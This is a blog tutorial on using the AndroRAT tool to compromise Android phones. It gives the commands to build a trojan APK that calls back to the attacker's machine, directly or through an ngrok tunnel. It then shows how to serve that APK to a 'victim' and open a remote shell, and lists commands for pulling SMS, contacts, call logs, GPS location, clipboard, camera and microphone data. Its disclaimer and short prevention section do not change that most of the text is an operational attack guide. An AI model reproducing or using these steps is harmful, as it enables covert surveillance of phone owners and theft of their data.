🔓 Complete Guide to AndroRAT: Hack Android Devices Over LAN & Internet Using Python - Educational Purposes Only

-

 ⚠️ Disclaimer: This tutorial is intended for educational and ethical hacking purposes only. Unauthorized access to devices is illegal. Use this tool only in a controlled environment or with explicit permission.

📌 What is AndroRAT?

AndroRAT (Android Remote Administration Tool) is a powerful open-source tool that allows you to remotely access and control Android devices. It is commonly used by cybersecurity learners and ethical hackers to understand how remote access works on Android.

AndroRAT is written in Python and works by creating a malicious APK file that, when installed on a target device, gives the attacker full control via a remote shell.

🎯 Features of AndroRAT

        AndroRAT offers an impressive range of features once connected to a victim's phone:

  • Access call logs, SMS, contacts

  • Capture camera photos or record audio/video

  • Track GPS location in real-time

  • Send fake messages or toasts

  • Even reboot the phone remotely!

Let’s walk through how to install, build the APK, and use these features—step by step.

🔧 Step-by-Step Installation of AndroRAT

        # Clone or enter the AndroRAT directory
            cd AndroRAT

        # Create and activate Python virtual environment
            python3 -m venv venv
            source venv/bin/activate

        # Install required dependencies
            pip3 install -r requirement.txt

        # Check your local IP address
            ifconfig

🛠️ Build the Malicious APK

To generate a custom APK (Remote Access Trojan):

    python3 androRAT.py --build --ip 10.0.0.6 --p 8000 -o rat.apk

✅ Replace 10.0.0.6 with your actual local IP address. This creates a payload APK (rat.apk) that connects back to your server.

🌐 Serve the APK via HTTP

To make the APK downloadable from another device on the local network:

        python3 -m http.server 8080

    Now open the browser on the victim's device and visit:

        http://10.0.0.6:8080/rat.apk

    Install the APK manually (ensure "Unknown Sources" is allowed).

💻 Start the Shell & Connect to the Victim

Once the victim installs and opens the RAT APK, connect to the session:

        python3 androRAT.py --shell --i 10.0.0.6 --p 8000

You now have a command-line shell connected to the Android phone.

📋 AndroRAT Command List Explained

Use the following commands to control the Android device:

CommandDescription
    deviceInfo    Displays model, Android version, etc.
    camList    Lists available cameras
    camera    Takes a photo using front/back camera
    recordMic        Records audio via microphone
    recordVideo    Records a short video
    getSMS inbox    Shows inbox SMS messages
    getSMS sent    Shows sent messages
    getCalllogs     Displays recent call logs
    getSimDetails        Shows SIM and carrier info
    getContacts    Dumps full contacts list
    getLocation    Tracks real-time GPS location
    getClipsData    Retrieves clipboard data
    getOperator    Shows network operator
    toast <msg>    Displays a fake message popup on screen
    reboot    Forces the device to restart

        You can perform these operations live through the AndroRAT shell.

🌍 Connect Over the Internet Using Ngrok

To control the Android device from anywhere in the world, use Ngrok to tunnel your server:


        python3 androRAT.py --build --ngrok -o devil.apk

✅ This creates a globally accessible APK. Ngrok handles the port forwarding, so the connection works across NAT or firewalls.

🔗 How to Connect Mobile Over Internet

  1. Install devil.apk on the target Android device.

  2. Run python3 androRAT.py --shell and wait for connection.

  3. Ngrok will handle incoming connections over the internet.

  4. The device now appears in your shell, ready for commands.

🎥 Watch Full Demo on YouTube

📺 I have created a step-by-step video tutorial on this setup, showing every step in action—from installation to full mobile control. 

Learn Mobile Hacking with AndroRAT – Guide for Ethical Hackers & Analysts

👉 https://youtu.be/fPXGDpnB3AQ



AndroRAT Mobile Hacking Prevention Techniques

1. ✅ Avoid Unknown APKs and Suspicious Downloads

Do not install apps from unofficial sources or unknown websites. AndroRAT usually spreads via fake or repacked APK files.
🔐 Tip: Enable "Google Play Protect" and disable "Install from Unknown Sources" in your phone settings.

2. 🔄 Keep Your Android OS and Apps Updated

Regular system updates patch critical vulnerabilities. Hackers often exploit outdated Android versions using RATs like AndroRAT.

3. 🛡️ Use a Trusted Mobile Security App

Install a reputable antivirus app (like Bitdefender, Kaspersky, or Malwarebytes) to detect and block RATs or Trojan-infected apps in real-time.

4. 📱 Check App Permissions Carefully

AndroRAT requires access to sensitive features like camera, microphone, contacts, and messages.
👀 Tip: Regularly review app permissions and revoke anything suspicious from Settings → Apps → Permissions.

5. 🌐 Be Cautious on Public Wi-Fi Networks

Avoid accessing sensitive data or downloading files on open/public Wi-Fi, as attackers can deploy remote tools like AndroRAT using MITM techniques.

6. 🔥 Reset or Reflash if Compromised

If you suspect infection, back up important data and perform a factory reset or reflash the ROM to fully wipe out persistent RAT infections.


Please like, share, and subscribe to my channel: Learncybersecurity BD
Created by: Engr. Md. Jashim Uddin

Comments

Post a Comment

Popular posts from this blog

How to Use Bettercap for ARP Spoofing & MITM Attacks and its Prevention: Being Expert of MITM

-
Image
  ARP Spoofing and MITM Attacks with Bettercap In the world of cybersecurity, one of the most common attack techniques used by hackers is the Man-in-the-Middle (MITM) attack, often combined with ARP (Address Resolution Protocol) spoofing. This article will explain the concepts of ARP spoofing, MITM attacks, why attackers use these methods, and how to use the Bettercap tool to perform these attacks effectively. I have made a youtube Video - Network hacking for this penetration attack. This is only for education purpose so please don't use this for any harmful activities. The author will not be liable for any bad activities.  What is ARP Spoofing? ARP spoofing, also known as ARP poisoning, is a method of attacking a local area network (LAN) by sending fake ARP messages to associate an attacker’s MAC address with the IP address of another device (such as a router or another user’s machine). This trick allows the attacker to intercept or alter traffic between devices on the...
Read more

How to protect ARP spoofing & DNS Spoofing in a Mikrotik Network.

-
Image
  MikroTik Network Security: How to Prevent ARP Spoofing and DNS Attacks   Understanding ARP Spoofing and DNS Spoofing        ·         ARP Spoofing: Attackers send fake ARP messages on the network to associate their MAC address               with an IP address (e.g., your gateway). This allows them to intercept, modify, or block network traffic (man-in-the-middle attacks). ·          DNS Spoofing: Attackers alter DNS queries to redirect users to malicious websites by sending false DNS responses or poisoning the DNS cache.  Here we divide the topic for best understanding and point out those Attacks prevention techniques step by step I have made a description youtube video for this if you like can watch this too. Click link   1. Steps to Protect Against ARP Spoofing        Enable ARP Filtering and ...
Read more